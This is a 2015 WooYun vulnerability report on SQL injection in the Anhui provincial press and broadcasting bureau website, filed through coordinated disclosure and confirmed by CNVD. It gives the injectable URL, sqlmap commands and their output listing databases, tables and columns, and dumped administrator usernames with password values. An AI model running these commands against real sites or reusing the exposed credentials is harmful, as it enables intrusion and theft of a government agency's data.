当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0103588

漏洞标题:安徽省新闻出版广电局官方网站SQL注入一枚

相关厂商:安徽省新闻出版广电局

漏洞作者: 路人甲

提交时间:2015-03-26 15:56

修复时间:2015-05-15 08:38

公开时间:2015-05-15 08:38

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-03-26: 细节已通知厂商并且等待厂商处理中
2015-03-31: 厂商已经确认,细节仅向厂商公开
2015-04-10: 细节向核心白帽子及相关领域专家公开
2015-04-20: 细节向普通白帽子公开
2015-04-30: 细节向实习白帽子公开
2015-05-15: 细节向公众公开

简要描述:

SQL注入,
晕,里面有这么多张表,71张表,得有多少数据泄露啊,

详细说明:

注入点:http://www.ahgd.gov.cn/bmxx.php?bid=1

E:\sqlmap2>sqlmap.py -u http://www.ahgd.gov.cn/bmxx.php?bid=1  --dbs
web application technology: PHP 5.2.8, Apache 2.0.59
back-end DBMS: MySQL >= 5.0.0
[21:32:19] [INFO] fetching database names
available databases [2]:
[*] information_schema
[*] webuser
E:\sqlmap2>sqlmap.py -u http://www.ahgd.gov.cn/bmxx.php?bid=1  --tables  -D webu
ser
[21:34:18] [INFO] fetching tables for database: 'webuser
Database: webuser
[71 tables]
+------------------------+
| branch_counter         |
| members_infomation     |
| members_infomation_ty  |
| web_ads                |
| web_ads_sites          |
| web_ads_ty             |
| web_author             |
| web_bbs                |
| web_bbs_ty             |
| web_bmxx               |
| web_bmxx_counter       |
| web_bmxx_ty            |
| web_bmxx_votelog       |
| web_branch             |
| web_coll               |
| web_coll_guest         |
| web_coll_ty            |
| web_content            |
| web_content_ty         |
| web_counter            |
| web_impart             |
| web_infomation         |
| web_infomation_comment |
| web_infomation_ty      |
| web_infovote           |
| web_inter              |
| web_inter_ty           |
| web_ldxx               |
| web_ldxx_ty            |
| web_lead               |
| web_lead_info          |
| web_lead_mail          |
| web_lead_mailty        |
| web_lead_ty            |
| web_lead_votelog       |
| web_link               |
| web_link_ty            |
| web_live               |
| web_live_link          |
| web_live_memoir        |
| web_live_pic           |
| web_log                |
| web_members_type       |
| web_menu               |
| web_online             |
| web_rss_ty             |
| web_sites              |
| web_source             |
| web_title              |
| web_title_counter      |
| web_topic              |
| web_topic_info         |
| web_topic_ty           |
| web_topicinfo          |
| web_topicinfo_ty       |
| web_topicinfophoto     
|
| web_topicinfophoto_ty  |
| web_topicinter         |
| web_user               |
| web_user_priv          |
| web_vod                |
| web_vod_ty             |
| web_vote               |
| web_vote_item          |
| web_vote_log           |
| web_vote_txt           |
| web_vote_ty            |
| web_wm                 |
| web_wm_ty              |
| web_xmt                |
| web_xmt_ty             |
Database: webuser
Table: web_user
[15 columns]
+------------+---------------------+
| Column     | Type                |
+------------+---------------------+
| Branch     | smallint(4)         |
| Cname      | varchar(50)         |
| Email      | varchar(50)         |
| Id         | mediumint(9)        |
| Info       | varchar(255)        |
| Lasttime   | datetime            |
| Logincount | int(10) unsigned    |
| MyMenu     | text                |
| Online     | tinyint(1) unsigned |
| Password   | varchar(40)         |
| Priv       | smallint(3)         |
| Sex        | char(2)             |
| Tel        | varchar(50)         |
| Uname      | varchar(60)         |
| Username   | varchar(40)         |
+------------+---------------------+
Table: web_lead
[15 columns]
+--------------+---------------------+
| Column       | Type                |
+--------------+---------------------+
| confirm_by   | varchar(40)         |
| confirm_time | datetime            |
| dutyname     | varchar(60)         |
| email        | varchar(50)         |
| id           | int(11)             |
| isshow       | int(1)              |
| morder       | int(6)              |
| name         | varchar(100)        |
| picpath      | varchar(40)         |
| respe        | text                |
| resume       | text                |
| sendbranch   | tinyint(6) unsigned |
| sendname     | varchar(30)         |
| sendtime     | datetime            |
| ty           | int(6) unsigned     |
Database: webuser
Table: web_user_priv
[3 columns]
+--------+--------------+
| Column | Type         |
+--------+--------------+
| Art    | varchar(100) |
| Id     | smallint(4)  |
| Priv   | text         |
+--------+--------------+
Database: webuser
Table: web_user
[8 entries]
+-------+----------+--------------------------+
| Uname | Username | Password                 |
+-------+----------+--------------------------+
| admin | admin    | 0e081a0d0b06201e17181b   |
| admin | admin    | 0e081a0d0b06201e17181b   |
| admin | jesse    | 0e081a0d0b065e3f5c5b5a21 |
| admin | jesse    | 0e081a0d0b065e3f5c5b5a21 |
| admin | zoubo    | 05100a1d104e4d4c         |
| admin | zoubo    | 05100a1d104e4d4c         |
| admin | xxbs     | 494a4b4c4d4e             |
| admin | xxbs     | 494a4b4c4d4e             |
+-------+----------+--------------------------+

漏洞证明:

数据我就不跑了,,

修复方案:

过滤吧,,

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:11

确认时间:2015-03-31 08:36

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT下发给安徽分中心,由其后续协调网站管理单位处置.

最新状态:

暂无